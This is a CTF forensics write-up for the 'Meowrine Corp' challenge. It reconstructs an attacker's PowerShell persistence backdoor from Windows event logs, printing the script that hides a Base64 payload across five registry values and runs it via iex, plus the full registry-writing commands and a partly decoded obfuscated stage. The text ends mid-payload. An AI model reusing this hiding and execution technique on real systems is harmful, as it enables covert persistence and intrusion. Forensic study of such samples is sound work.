COMPFEST CTF 2025

COMPFEST CTF 2025

Aristore
  2025-10-05 17:45 2025-10-05 17:45 创建   2025-10-05 17:46:42 2025-10-05 17:46:42 更新    3.7k 字  22 分钟  

Forensics

Meowrine Corp

Challenge

A hacker recently got access to the computer of a high ranking admiral of the meowrine corp. We managed to kick him out and made sure nothing was stolen. However something weird has been going on over our network now. We suspect it is related to the recent hack so to help you, I’ve given you the logs during the hack and the network capture. Can you trace back the events that happened?

Solution

Traffic analysis reveals that a large amount of data was uploaded from 192.168.18.84 to 192.168.18.76. This could be information exfiltrated by the attacker.

Investigating the logs, critical information was found in Microsoft-Windows-PowerShell%4Operational.evtx.

A persistence backdoor was discovered in Event ID 20:

1
2
3
4
5
6
7
8
9
$script = '$k=@("HKCU:\Environment","HKCU:\Console","HKCU:\Keyboard Layout","HKCU:\Control Panel\Desktop","HKCU:\Control Panel\Accessibility");$n=@("boot","update","load","install","exec");$s="";0..4|%{$s+=Get-ItemPropertyValue -Path $k[$_] -Name $n[$_]};iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))';

$p = "C:\Users\Whiskerstein\AppData\Local\Packages\MicrosoftTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\Default";

$f = Join-Path $p "restart.ps1";

if(-not(Test-Path $p)){New-Item -ItemType Directory -Path $p -Force|Out-Null};

Set-Content -Path $f -Value $script -Encoding UTF8

  1. Creating the Backdoor Script File:

    • $p = "C:\Users\Whiskerstein\...": Defines a seemingly normal path, hiding the malicious file within a legitimate application’s folder to evade detection.
    • $f = Join-Path $p "restart.ps1": Defines the backdoor script’s filename as restart.ps1.
    • if(-not(Test-Path...)){New-Item...}: Checks if the path exists, and creates it if it doesn’t.
    • Set-Content -Path $f -Value $script...: Writes the string content from the $script variable into the C:\...\restart.ps1 file.

  2. Backdoor Script Logic (the $script variable):

    • $k=@("HKCU:\Environment", ...): Defines an array containing five registry paths.
    • $n=@("boot","update","load","install","exec"): Defines an array containing five registry value names.
    • $s="";0..4|%{$s+=Get-ItemPropertyValue ...}:
      • Reads the value of boot from HKCU:\Environment
      • Reads the value of update from HKCU:\Console
      • Reads the value of load from HKCU:\Keyboard Layout
      • Reads the value of install from HKCU:\Control Panel\Desktop
      • Reads the value of exec from HKCU:\Control Panel\Accessibility
      • Then, it concatenates these five retrieved values into a single long string, $s.
    • iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))):
      • [Convert]::FromBase64String($s): Decodes the concatenated string $s from Base64.
      • [Text.Encoding]::UTF8.GetString(...): Converts the decoded bytes back into a UTF8 string.
      • iex: (Invoke-Expression) Executes this string.

Instead of writing the full malicious code directly into the .ps1 file, the attacker Base64-encoded the payload, split it into five parts, and hid each part in five different, seemingly harmless registry values.

Next, while examining the rest of the logs, traces of the attacker using PowerShell to write malicious content to the registry were found:

  1. boot (from Event ID 14)
1
New-ItemProperty -Path "HKCU:\Environment" -Name "boot" -Value "JHg9MTA5OyRjPSdTUjlOVUVvVkNBUVJSRVJLU2xrN09neFZBVDRtVkFFRUl4VWFQaVlVR2dRTUJnb1VOeGdCQUE1ZEl3TTBYQ01CSVFJL0xpWUJQelVJTGxRcU8xc0NPVFZkSnpVM1gxaGZEeWtaWEFnZEpEazlId0lxSjFvS0tna0RXRG8zSUZndURBWThKUThaQWlvbldpdzVQUncvTGlZVVZBQTNBaXdvSmdOWU9nd1VQMTQ0WFR0ZlB4Z0dPRDRwSXpzOFd3STVOUU5ZT2d3R1ZGODBHRHNHSVYwRk5UYzRXRDRQQVQ5ZURsZ2pYRHBhWFRVbUZWMHVERjBKQUE4QkZRWWhBajh1SVJvS0ZEY1lBUUFPWFNNRE5Gd2pBU0VDUHo0OUFqOFVDQjBzT1RjWVhBUWdBUW9xQ1FOWU9qY2dXQzRNQmdvRU54MFpCdzRHWFNrTUJoNDVDeDhlTGc0R0hqa21IVDgrSVFJL1hqY1lPeW81R0NBbEp4NG9LU1lZQVRvNVd3STVOUUkvTlRRakdUczlId1lxSjFwZFhqUUdYUmNtSFQ4VUloMGdLaWNlQmlvbkFnNEFEeDBuSlFrWEp6b0pPVmdVRGdaZEZ5WVVQeFFJSFN3cENRTmNGRFFHQ2dRM0hSazVKaDAvUGlFQ1AxNDNHRHNxT1JnZ0pTY2VQQ1VuQWxrNkRDTWRCeUlKQlNvSkJWeGRPbFFnS2lkYVhWd2dBU3dsSnc4QkZDQWVKQ2toRlFvdVBGUThKU2RhQVM0TVhRa0FEd0VWQmlFWFB5NEpIbHcrREFZS1BqY2VBU29NWGhrcElGUXNKU2RhTERrOUhUOFVJZ01PUGowVVB4UWlBd1lxSURzbk9TTUdDUWMwUEFrcElnYzNGejBYTkNraldnNDVJRjgzT1NBWE5DazNIdzRwTnhVT0J5TUdDVGtqSXpjNUl3UUpCejhCTnpraUx6Y3BJem9KT1NjQk53YzNCVFFYSUJjOEtTQllEaGMwT2pjcEl4OEpPUTRCTnpraldqUVhORG8zS1NOWU5CY2dXanNwSUFvbk9RZ0JOd2MzQ1RjNUlnVTNCenBkRGhjZ0h6YzVJQTQvQnlZVURnYzNIelFISUFFSk9TQVVEamtqWFQ4cE53RW5LVDBhSkRralhqY1hJQmczRnlRVURnYzNHalFISXhrL09UZ0dKeWtnSGljNU5BQUpGemdHTndjak9na1hJRDgzT1NaZEpDa2dGU2NwTnpzM0J6ZGNOQ2tqWHc0NUlnOC9LU1lHSnprakZ6Y0hJd0VPRnpVQU55azNYalE1SXlFM0J3a1VPQWMwRkE0NUlpOG5GemtGQ1NrM05UY0hJeUlKQndnWE5Da2pHQ1FwSUNrbkZ6cFpOQ2tqR3drNUlBRTBCeVlhT0NrM1hDY3BJd1lKRndrWERqa2pSalFwSXgwNEZ5TlpKQWNqRkRjNUlrWTNPU01FSXhjME9EY1hOQUkwS1RoY0RqazNJejhwTng0bkJ3OWREamtqR2c0SE55dy9Gd2dIQ1RrakJEUTVJd01KQnd3Qk56a2lHelFwSTE4T0J3a0JOd2MzWFRjWElEby9PVHhZRGhjME9qY3BJMW9KRnlNQk56a2pJRGNYTkNFM0Z6NVlOQmNnSERncElDUW5PVGNCTndjM0ZUYzVJZzQzQnpoZERoY2dMRGM1SUFjOE9UVVVEZ2MzWHpjSElDWUpLVG9VRGprak56OHBOd1luS1F3YUpDazNSZ2s1SWh3bk9UZGZORGtnTkRjNUl6dzNPU01IUHlrM0J5Y3BJQWNuRnpzRkNTazNRalFISTE0T0J3a1hOQ2tqT2ljcElCa2tGemxaTkNrakRnazVJQVEzRno0YU9DazNIaWNwSTFVSktRbFlOQmMwQmpjcElBQUpGenNYT0NraUppY3BOd2dqQnlNVUpEa2pHRGNwTng4M09Rc1ZORGszS2pjNUl4VTBPUTRITnpraVhUUUhJMTA4S1FzR0p5a2lWRHNISUQwbk9UNEVDU2tnSFQ4cElCc2tGejhYRGdjZ1dnNDVJeWMzQnlSZE5Ea2dSalE1SXpjM09UVlpQQ2szSlNjcElGa25LVDRVSkNrM096YzVJRmczQnlCY05BY2dCd2twSXhnT0J6Z1hEaWszR0NjcEkwWUpCelJjTkNrakFna1hJQXczRnowQU53YzNJU2M1TjE0MEJ5WUFOemtpS3pjcEl3VU9PU0FWTkJjZ05UYzVJaU0zT1RzSE55a2dCd2twSUJVT09Ud1ZOQWNnUHljcElDRW5PU0JjTkNrZ1d3azVJanNKQnc1ZE9Da2pHQTQ1TndBM0tUNWNOQ2tqS2drNU4xdzBPU2N" -PropertyType String -Force
  1. update (from Event ID 10)
1
New-ItemProperty -Path "HKCU:\Console" -Name "update" -Value "BTnhjZ0dEOHBOeWduRnpnYUpEazBGUWtwTjE4M09RdGZEaGNnSGpRcEl6VW5LU0lhSkRralhqY1hOQnMwQnpWWU5BY2pIejg1TjFrM0tUUllQQ2szWENRcElCZ25CeVJkRGhjZ0RBa0hOeFUwQnljYU9Da2dDQ2NwSTFzMEZ3NEFOeWtpQVRRcEl4Z0pLUWxjTkNrM0FUOHBOeGNrT1NBYUpBY2dDU2NwSTFRM0tTSVZOQWMzSnpjWE5CazBLU0lhRGpralBBa0hOMFlrRnc0YUlDa2lGU0FwSUFrak9TTlpJRGswWHlNSEl4b2pPU1JlSURrM1ZTY3BJaHdnT1NFVklEazNDQ2NwSWxzaktRbGZJRGtnSmlNNU53Y2tLVGdVSURraU9pTTVJQWtqQnowQUp3YzNIU1E1TkFJaktTY2FEaWtqV0E0cEl3UU9PVHBaTkFjZ0JpUXBJRmdrS1F4WU5BY2dYdzQ1SXhjNEZ3Z0dKeWtnSHljSElCd0pLVDFlRGpraUFqUUhORDhqRnpSY05Ea2pSZzQ1TndNM0Z6aFlOQ2tqUGdrNU56YzNLUXdBTnhjZ0t6ODVJam9KS1NZSE55a2pEQWs1TndRM0J5ZGNOQmMwWERRNUlsazNCemtYT0NrZ0J5YzVOeGcwS1E4QU56a2lCamNwSTFVSkJ3Z1hORGtnWEQ4SElCc0pPU0FBTndjZ1d3a0hJQ29KS1RSY1BDazNYaVFwSUY0a0tRNWNOQmNnR1RRSElBZ0pCd2tBTndjakNUOHBOeWduT1NRYUpEazBYalFITkFvM0J5TmRORGtnUGpjcEl3ODNGd2tYRGprM05UY0hJd1UzS1RSZEpDa2dIeWNwTnlJM0Z6VmNOQ2tqSVFrNUlsODhPU0lHSnpralh6UUhJeWtKT1QwQU55azNSamM1SXljM0Z6a1VPQWMwRnlBNUlrSWtGd2dYRGprakJUUXBJeThKS1RkWURnY2dPVDhwSXgwMEZ3NWNORGszUERjNUlqbzNGeUlVTkNrM0FEY0hOeXczQnpnWE5Da2pYaVFYTkNBbktUc0ZDU2szRHpjSEl3Y0pCeVFYTkNralZTY3BJZ1VuT1NBWERqa2pMemNwSXpvSk9UbFlEZ2NnRGo4WE5DQTNCemtITnprZ1d6dzVJeGszQnpWZERqa2lHRFFISUJrT0J5ZGVPRGswQWlNNU5Da2pGd2dHT3prakN6Y1hORjgwT1FoWU5BY2pGRHc1TndrbktUY0FQemtpWFQ4NU4xb2tPVDhHTnpralhEY3BJd1FPRno4WERqa2lBQTRYSUZ3N0tUUUVPd2MwV1NBNUlCUTNCelFHTnlrakNEY3BJd1VrT1FnRUp3Y2dGelFwSWxVM09TRmVORGtnSHpRSElGNDNCenRlTkRrZ0ZUUXBJeFFuT1RVRUp3YzNYemNISUFZSk9UdGNOQWMzR2pRNUlBd0pPU0FhRGlraldpUXBOMXNqS1RzWERqa2pYalFwSXlzSk9UeFlEZ2NnWFQ4cEl3bzNPVDVjTkRrM0FqUTVJaVEzT1NNVU5DazNIelFITngwME9UNFhOQ2tqR1NRSE5DY2pGeVpZSkNraUhTUTVJeDAwT1RRWERnYzNIemNwSUFjSkJ3NFhEamtpQmpRcEl3WThCendCSnhjZ0ZRazVJQmszRnc4Vk5EazNORGNISXdFMEJ5Y1ZOQ2szUmpRcEl6VTNCeVJkSkFjMEJDQTVJbHNrRno5Wk5Da2pBUWtYSXlRM09RZ0JOemtqWGpjWE5GUS9CeUlCSnhjZ0h3azVOMXcwQnljRU54YzBXRFE1SURjM0J3OEJOd2NqQXpjcEkxUTNCenBkSkJjMEFTUXBJRHNqRndrSEp4Y2dCZ2s1TnowM09UUUVOeGMwRGpjNUlDbzNGem9CTndjalZEY3BJeGcwS1NOZEpDa2lIU2NITkZrM0Z3a1hOQWMzSFRRWE5CVTNPVDhVUEJjMENUYzVJQ2MzRnprQk56a2lIVGNISXhvL0J6OEdOd2NnV3c0SE53QTNCeU5mTkJjZ1h3NDVOMTQzQnd3Vk5BY2dSZ2twSXhzNEZ6Y0JKd2NnSVFrSE56dzNPVHBkRGlrZ1ZBNDVJaHdPS1R3VURoY2dBalE1TndBMEJ3NWNOQ2tqQnljcE55UWpGeUFVTkNraUJEUVhJeDgwQnowVk5BY2dWRGNYSXhjMEJ3a1ZOQ2tqWGljSE5Ca2dLU1pZSkRrMEF6Y0hOQ2szQnpWZE5Ea2dBemNwSXdJM09Ud1hEamszQVRjSEkxczNGd2xkSkNraVhDY1hJQVFPRnlOY05Da2pIUWs1SWlNSk9RNFVQQmMwTHpjWE5EZzNLUThWUE" -PropertyType String -Force
  1. load (from Event ID 16)
1
New-ItemProperty -Path "HKCU:\Keyboard Layout" -Name "load" -Value "NralZEUTVJQUkwT1F0Y05BY2dCRHM1TkE0akJ6c0ZJeWszQURnNUkxODNGenNITnpraU5UY0hJd2cvS1NZQkp3YzNDajg1SWhrOEJ5UUJKeWszQlRRNUl4MDNLVHRkRGhjZ09BazVJZ0lKS1FzWE9BYzBBRGdwTnhzakZ6c1hEamszWHpjSE5CYzNLVDBITnprZ0FUUTVOMXMwQnpSZk5Da2pLRGNwSXdBbkZ6NEVJemtpT3ljcElsc2tPVDBVRGdjM1JqUXBJMVVKQnc4YURqa2lId2tISUNnSkJ3c1hORGszWGpRNUl5dy9PVHhjTkNrakhnazVJQmMwRnpwY05BY2dPZ2tYSUVZL0Z5UUJKeGNnV1E0NUlCazNCeWNWTkRrM0tqY0hJd1EzS1RjVk5DazNJemNwSTFvMEtUVmRKQ2szSGlNSElCNEpPVDBBTnlrak9Ba3BJQm9KQnpsWURnY2dCQWtYSUZvME9RZ0JOemtqRkRRcEl4b25GemdFSXprZ09UY3BOeWczQndsZE5Da2pRaVFwTnl3akZ6UmZPRGtpVlQ4NU53b25GeU1YRGprZ0dEUTVJQTQzS1E0Qk53Y2pYalE1SUZzMEZ6b0dOeWtqSERRcEkxMG5GejhFSXdjM0d6UUhJRndKS1QxY05BYzNJemM1SUFBSktUb2FEaWtqWFNRcE53QWpGd3hZRGprakhUUUhORHcvQnc0Qkp4Y2dCZ2s1SURrM0J5SVZORGszRHpjSEkxazNPUWtWTkNrM1ZEY3BJejAzT1NaZEpBYzBPU001SWtZa0tRaFpKRGtqRnpRcEl3SU9CemdWTkRrakJUUUhJQThKS1NNWFBEazBXaUE1TkFNak9Ud0dPeGNnT0FrNUkxVTNGd2tWUERrM1JpUTVJaXNKRnpSWk5Da2dYUWs1SUFJM0Z6VVVEaGNqQWpjSE56UTNPVGxkRGlrZ0pnazVJZ1FPT1RRVURoY2dIVDg1Tnh3bkJ3aFlEaWtqR3drNUloazBGd3dVRGprald3NFhJRGMzQnlCY05CY2dGVGc1Tnlrbk9UUUdOemtqQlRRcEl3VUpGeUFYRGpraUtRa1hJQ003S1NjRU95azNPQ01YSUFVSktUb1ZORGtnQlRRNU54ZzNPVHRmTkRrZ0NqY3BOeGMzS1R4ZE5Da2pCQ2NITkFVZ0J6aFlKQ2tpQkNRNUl3azNGejhYRGdjM0JqUXBJQmNPT1NJWERqa2lDVGNwSXpjL0tTTUJKeWszQ3pjcEl3WTNCejFmTkJjZ0dna0hJeW8zQnpnRkNTa2pIU2NITkFJZ09UUllKRGtnQnpjcE54ZzBGdzlkTkNralJpUXBJaGtuRnlJWERqa2pBVGNwSXlnSktTZFlEZ2NnRkQ4cEkxc0pPVDFjTkJjaldUODVOMW9rQnlZR055a2pXVFFISXdVMEtROFhEZ2NqSGpRNU5Ca0pPU0pkSkFjME9pTTVJaGduRnpnQU53Y2dGUTQ1SXg0M0J3a0FOemtnV2drcElEb0pLUWxkSkNraUlTY1hJQ0VKRnlOY05Da2pEZ2s1SWc0SkJ5SVVQQ2tqQUE0NUl4ZzBCejllUERrM1h5UXBOeFUzT1RsZE5BY2pEemNYSUJ3T0Z3aGZORGswV0FrcEl4c25Cd2tFSXpraUlDY3BJa0lrS1RWY05Da2pSZ2s1SURvM0tUMWNOQWNnR1FrWElBYzhGdzRGSXprMEZ5TXBOelE3Rno4VURqa2pXalFwSXdVM0J3bFlOQWNqQUFrSE54MDNLVDBVRGlrZ1ZEZzVJMXMwQnc0WE5Ea2lWRFFISXhvT09TWVVEamtqSHpRWElGNDdPVG9BTnlrakhBNHBJQVVKS1Q5WURnY2dKd2tYSUJnOE9TQmVQRGszUGo4SElBVTdPVG9CSnpraUtna3BJajgzRnprYURqa2dWVFFISUJnT0J5TmVOQWMzQURjcEl5Z0pGemNhRGpraUhnNEhJQlFKT1FzWFBEazNHU1E1SWxVSk9UdGREamtpRERjSElCa09GejljRGhjZ0pEYzVJejQzQndzWE9EazNHQ1FwTngwM0Z3eGNOQ2tqQkE0WElGa0pCd2hZRGhjZ0l6c0hORlU0S1RrR0l5azNHelFwSTFrM0tRNWZOQmNnVlFrSEl5NDNPU0lGQ1NraldDY0hOQ3dqS1NkZklEa2dPeU1wSUFrbkJ6UUdPd2MwWFRnNUl3NDNLVFJkRGpraVJnNEhJRGczS1R3YUpDa2pWUTRYSUN3M0J5SmNORGswWERRSElCVTNLVDhBUHlrM0FDY1hJeThKQnpsY05EazNIVDhwTnlRak9UZ1ZOQ2szRlRjcEl6czNGd2xkSkFj" -PropertyType String -Force
  1. install (from Event ID 12)
1
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "install" -Value "MFZTQUhJd1FnT1RVVklDa2dOU2NwTnlJN0Z3NEVPemtqRGpjcEkxd0pPVDVZRGdjZ1hqY3BJRGNuRnp0ZERoY2dKRGM1STFrM0tRZ0ZOd2NnVlRRSE54NDhLUXdHSnhjakJ3azVJd1UzRnpRQlB5azNJeU1ITndVMEJ6Z1VEamtqRERjSE53QTBLVDRWRGlrZ0t3a3BJeGNrS1FzRUNUa2lXQ2M1TkJnM0Z3NEVOeWtqS2pjNUlBczNGemRkTkJjZ0NnazVOd2MwQnlSZk5Da2pLaWNwSUJvbkZ5TlpOQ2tqWGc0NUlDODNPU01hT0NrM0JDY3BJeUlKQnprWERqa2pBVFFwSXg4NEJ5SlpKQWNqQVRjNUlqMDNCeVlFSXpralhUUTVJeGdKS1RnQk56a2lJRGNwSXhvSkZ5RUJOd2MzV2pRWElBYy9GejlZRGhjMEpEY3BJelVKT1NFQk56a2pKRGNYTkFJM09TQllOQmNnTnpzcElBUWtGeU1CTndjM1dqUTVJa0kwRnc5ZERoY2dGelE1SUJ3OE9TUVVEZ2MzT3pjSElGUU9PU1lVRGpraktUOHBOMVFrT1RRYUpDa2pEd2tYSUQ0SkZ5WmNOQ2tqSWdrWElDWUpPU0lWTkFjalBEOHBJQThuS1RRSE56a2pIalFISTFVT09TZGNOQmMwUHo4NU4xZzNGelFBTnpraU9UY1hJQjBPS1Q0WERqa2pJVGNISURzSkJ6MGFEaWszWFRjSE53TTNCeVFYUENrM1hpUXBJQWduRnpvRk53YzBMamNwSXdrM09Rc1ZOQ2tqSlRjWElEc0pGeVFCTndjalhEUXBJMVFuT1R3YUpDa2lBemNwSXhrSkJ6OFZOQ2tnT2pzNU4xbzNGemdBTnpraVBqY3BJeVFKQndzVk5EazNXelE1SWpRM0J6UmREaGNnS0FrNUl6czNPUTVkUENrM0FTY3BJQVFuRnpwY05BY2pPQWs1SWpvM0Z6OVpOQmNnRHpjSElGNE9CejhWUENrM0JpUVhJRlVKQndrWERqa2pBRFFISUZzSkJ3NGFEaWszQ2pjSE54VTNLU01YUEJjMFhRNHBOd0VPT1NBVUpDa2dGQWtwTnhnM0J3bGREamszSENjNU5EMG5GemNVSkNrZ1dDUTVJem8zS1Q0RU56a2lWVGNYTkFBM0Z5WmREZ2MzUFRjNU53RTNPU1lHSnlrZ1BDYzVJMXMwQnpvR056a2dGRGM1TndjL0J6a0JKd2MzRlRzcEl5Y25LVGthSkNralBUYzVOeGMzQnowVk5DazNKU2NwSUZza0tRa1VKRGswV3ljcEl3c0pGd3dhRGpraU5EY0hJQVVPS1NZWE5CY2dCQTQ1TnlrM0Z5TVZOQWNnV2c0cEl6MEpCd3dGSndjZ0JTUXBJQmtuT1R4Y05BYzBIamM1SWw4ME9TRUhOeWtqQndrSE53STNPVGtCTnlrM0xDY3BJQXNuQnlOY05DazNDemM1SUJjM0Z5SUJQemszQnlRSE4xUTRPU0ZkSkNrZ0dpUXBJeGczQnowQk56a2dXVGNwTnlZbktUVWFKQWNnSndrNUl3STNCdzRCTnpraVdqYzVJQUkzRnpoZERqazNWVFFITjE0MEtTSVhQQmNnWHdrNUlpNC9GdzhYT0NrZ0NUczVOeUluT1FnQU95a2pHU2NwSUY0bktUeGREZ2MzQWpRNU54czNPUXNHSndjMEhBa3BJem9KS1E4WE5Ea2pYamM1TkFJMEtUc1VOQWMzTno4cE4xa25PUTljTkFjZ0h3azVJd2czS1FsWk5CY2pHRGdYTkIwT0J5ZGNOQmMwR2pjNUloNDBPVFZmUENrM1dTY3BJQVFuRno1Y05CY2dId2tISUZzSkZ5UmNEaGNnT2pjNUl5azNCeUFVT0NrM09DY3BJQlVrS1RVVUpCY2dGQTRwSXljSkJ6Y0JOemtqUWpRcE54bzBLVDFjRGhjZ0FqUUhOeGcwQnc1ZFBCYzBCVHM1SXc0L0J6VUhQemtpWGp3SEl4US9CdzhBUHdjZ0lEc3BJQlU0T1NFVU9Ea2pQajhYSUFZNE9UVmNPRGswV0NNSEl3a0pCdzRCTnprakxEY3BJMW9rT1RrVUpDa2dCeVFwTnl3M0Z3aGNOQ2tqVlE0NUlpTS9PVHRkTkJjMEFEUTVJalEzT1NCWk5CY2dMejhwTjFnbkJ3aGREamtqUERjWEkxNDhPVFFFQ1RraVdnNEhJQlFKQnp0ZERnYzBPaU1ISUFrbk9TY1hORGszRnpRNUl5STNPU0VCSnlraUtEY0hOQ1kzS1Q0Rk53Y2pCVGNYSUE4Sk9UaGRORGtnSHpjNUlCbzNLVGRkSkJjME" -PropertyType String -Force
  1. exec (from Event ID 18)
1
New-ItemProperty -Path "HKCU:\Control Panel\Accessibility" -Name "exec" -Value "5Uc3BJRUk0T1FzR1B6a2pJRDhwSXlnN09Ra0ZJd2NqV0FrNU54MDBLVDljTkNrakJpY0hJQVlrT1NjR0l6azBEQWtwTnhjMEZ3aGZEaGNnSURjcEl3OG5GejhFSXdjZ0Z5Y3BJRFVKT1QxWU5EazBMQWs1Tnhva0tUcFpOQWMwTGpjNU5GMDNCeVJmTkJjZ1hRa3BJd3MzQndrVk5Ea2dXVGNwSXdVbkJ6Z0hPeWtnSERncE53NC9GeUpjUENrakRqczVOQThqQnd0ZkRqazNGVGM1STBZMEZ6ZGRKQWNnV2lRcE4xb2dCejBGTndjMFd6Y3BJeDAwQno4Vk5Da2pKVGNYSUFJSkJ5RUJOd2NqR2pRcEkxc2tPVGNFSXpraUl5Y3BOeUlKRnlJR096a2lXeVFwSWtZMEZ5UmREaGNqTERjNU54VTNLUXhjTkJjMEl6ODVOd2NrS1NBVVBEa2dDejg1SWtZM0tReFlORGtpUEQ4NUlqUS9LU0JZUEFjZ0lqOEhJQm84T1FzVVBBY2dDajhISUZvOEtTRVZQRGtnQXo4NUlEVS9LUXdWUERrZ1ZUODVJQUUvT1Q0VlBEa2dHVHc1SUJ3OEJ6b1ZQRGtnT1Q4NUlGczhCemdWUERrZ0lEOHBJeGduT1NRYUpDazNQVGM1SXhVT0tUb0dOemtpSVRjcEloVUpPVGtWTkNrM0dEd3BOd1FuT1NjYUpDazNPamNITnp3M0Z6cGRORGszS1RjNUlBRTBCem9VT0NrM09pY3BJMTRKS1RwY05CY2pCandwSWgwbkJ6VUVPd2NnQ3o4NUlDay9GemxZTkRraU9EYzVJancvQnpoWVBEa2lKajhISUFNL09UOFVQQWNnS3o4SElDUS9GelFVUERrZ05EODVJQmsvT1NjVlBEa2dXanc1SUZRL0J5RVZQRGtnSGp3NUlBYzhLU0FWUERrZ1dqdzVJQmc4S1FrVlBEa2dCejg1SUFnL09UdGRKQWMwWHdrcElsNDBCelVYTkRrZ0tqYzVJelUvS1RVVURnYzNIVGNISXgwL0tUa0hDVGtpSmljNUl3a2pPU1lWSURrM0NTYzVOeDhuS1Q4VklDa2lEaWNwSWpjbktTQUJOemtpWHpjSE54czBCemNGTnlrM0xpY3BOdzRqT1E5Wk5BYzBIamM1TkZVME9UMWZOQmNnQXdrcEkxUTBCelFWTkRrZ0tqY3BJd1VrQnlRRUl4Y2pCQ1E1TnhjT09Ua0dDUWMwSHc0cE55dzdCeU1FT3lrM0hpQXBOMThrS1QwRUp3YzNJRHM1SWc0bkZ3eFpKQWNqV0NjNU54azRGemRjSkNrakZTUVhJQ1FuS1Q0YVBEa2dHeVE1TkFjT0J3OVlEaWtpRkE0WEkxb09CeUZmRGprakJRa3BJd29KRnlBWERnY2dDd2s1SUFFSkZ5QWFEZ2MzSFRRNU54YzNGendHTnhjMEFEY0hORG8zQnc0Rk56a2lCelFwSWxrM09UVmVOQWNqRGpjNUkwWTBGenhkTkJjZ05UY0hJQlEwT1NjVk5EazBJRHM1SWdjN0J6OVpPQmNqTkRzSEl6ODdCenRjT0NraldUZ1hJRVk0QnowVU9Ea2dKRHNwSUFVNEtUMEFQemszWGp3cE54OC9GdzhIUHdjME9UODVOQVk4T1NkWVBDa2lLVDhYSXlRL0tRdGZQRGtqQWo4cEkxcy9GemdYUEFjZ0pEODVJRFEvT1FsWUlDa2lCU01YSTFrakZ3bGZJRGtqUHlNcEkxNGdGdzRYSUFjZ0ZTQTVJQm9qT1NNYUlCY2pCaVFwTnlJakJ5UVVQRGtnSHo4NUlrWTBPVGhZTkRraUhqdzVJamcvQndsWVBBY2dLajhISUJjOEZ6NFVQQWNnUHo4SElCbzhCejRWUERrZ0JEODVJQWsvS1RRVlBEa2dKVDg1SUFFOEtRd1ZQRGtnRkQ4NUlBQS9CeVlWUERrZ0xqODVJRjQ4T1RvVlBEa2dWRDhwSTE0bkZ5ZFVJQ1VuU2twRkNnTUVIeGsrV1ZzSUhnd3ZBQUlmSzFkWE1Ca2ZDQnNEQWk1REFBZ1pIaFErTmtVS0F3UWZHVDRaQ0NwRFZTczVPRmRYTUFvREJBa0NEZ01vUXhrVkNEbERBQWdaSGhRK05rcFdTUjgyUUZ4RFEwQkZTUjlESVFnRENoa0ZSREJOUUFjQ0JBTk5Ta3BORVUwRUNCVT0nOyR4ZD1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjKTskcmQ9Jyc7Zm9yZWFjaCgkYiBpbiAkeGQpeyRyZCs9W2NoYXJdKCRiIC1ieG9yICR4KX07aWV4ICRyZA==" -PropertyType String -Force

Concatenating the values in the order boot -> update -> load -> install -> exec and then Base64-decoding the result yields:

1
$x=109;$c='SR9NUEoVCAQRRERKSlk7OgxVAT4mVAEEIxUaPiYUGgQMBgoUNxgBAA5dIwM0XCMBIQI/LiYBPzUILlQqO1sCOTVdJzU3X1hfDykZXAgdJDk9HwIqJ1oKKgkDWDo3IFguDAY8JQ8ZAionWiw5PRw/LiYUVAA3AiwoJgNYOgwUP144XTtfPxgGOD4pIzs8WwI5NQNYOgwGVF80GDsGIV0FNTc4WD4PAT9eDlgjXDpaXTUmFV0uDF0JAA8BFQYhAj8uIRoKFDcYAQAOXSMDNFwjASECPz49Aj8UCB0sOTcYXAQgAQoqCQNYOjcgWC4MBgoENx0ZBw4GXSkMBh45Cx8eLg4GHjkmHT8+IQI/XjcYOyo5GCAlJx4oKSYYATo5WwI5NQI/NTQjGTs9HwYqJ1pdXjQGXRcmHT8UIh0gKiceBionAg4ADx0nJQkXJzoJOVgUDgZdFyYUPxQIHSwpCQNcFDQGCgQ3HRk5Jh0/PiECP143GDsqORggJScePCUnAlk6DCMdByIJBSoJBVxdOlQgKidaXVwgASwlJw8BFCAeJCkhFQouPFQ8JSdaAS4MXQkADwEVBiEXPy4JHlw+DAYKPjceASoMXhkpIFQsJSdaLDk9HT8UIgMOPj0UPxQiAwYqIDsnOSMGCQc0PAkpIgc3Fz0XNCkjWg45IF83OSAXNCk3Hw4pNxUOByMGCTkjIzc5IwQJBz8BNzkiLzcpIzoJOScBNwc3BTQXIBc8KSBYDhc0OjcpIx8JOQ4BNzkjWjQXNDo3KSNYNBcgWjspIAonOQgBNwc3CTc5IgU3BzpdDhcgHzc5IA4/ByYUDgc3HzQHIAEJOSAUDjkjXT8pNwEnKT0aJDkjXjcXIBg3FyQUDgc3GjQHIxk/OTgGJykgHic5NAAJFzgGNwcjOgkXID83OSZdJCkgFScpNzs3BzdcNCkjXw45Ig8/KSYGJzkjFzcHIwEOFzUANyk3XjQ5IyE3BwkUOAc0FA45Ii8nFzkFCSk3NTcHIyIJBwgXNCkjGCQpICknFzpZNCkjGwk5IAE0ByYaOCk3XCcpIwYJFwkXDjkjRjQpIx04FyNZJAcjFDc5IkY3OSMEIxc0ODcXNAI0KThcDjk3Iz8pNx4nBw9dDjkjGg4HNyw/FwgHCTkjBDQ5IwMJBwwBNzkiGzQpI18OBwkBNwc3XTcXIDo/OTxYDhc0OjcpI1oJFyMBNzkjIDcXNCE3Fz5YNBcgHDgpICQnOTcBNwc3FTc5Ig43BzhdDhcgLDc5IAc8OTUUDgc3XzcHICYJKToUDjkjNz8pNwYnKQwaJCk3Rgk5IhwnOTdfNDkgNDc5Izw3OSMHPyk3BycpIAcnFzsFCSk3QjQHI14OBwkXNCkjOicpIBkkFzlZNCkjDgk5IAQ3Fz4aOCk3HicpI1UJKQlYNBc0BjcpIAAJFzsXOCkiJicpNwgjByMUJDkjGDcpNx83OQsVNDk3Kjc5IxU0OQ4HNzkiXTQHI108KQsGJykiVDsHID0nOT4ECSkgHT8pIBskFz8XDgcgWg45Iyc3ByRdNDkgRjQ5Izc3OTVZPCk3JScpIFknKT4UJCk3Ozc5IFg3ByBcNAcgBwkpIxgOBzgXDik3GCcpI0YJBzRcNCkjAgkXIAw3Fz0ANwc3ISc5N140ByYANzkiKzcpIwUOOSAVNBcgNTc5IiM3OTsHNykgBwkpIBUOOTwVNAcgPycpICEnOSBcNCkgWwk5IjsJBw5dOCkjGA45NwA3KT5cNCkjKgk5N1w0OScANxcgGD8pNygnFzgaJDk0FQkpN183OQtfDhcgHjQpIzUnKSIaJDkjXjcXNBs0BzVYNAcjHz85N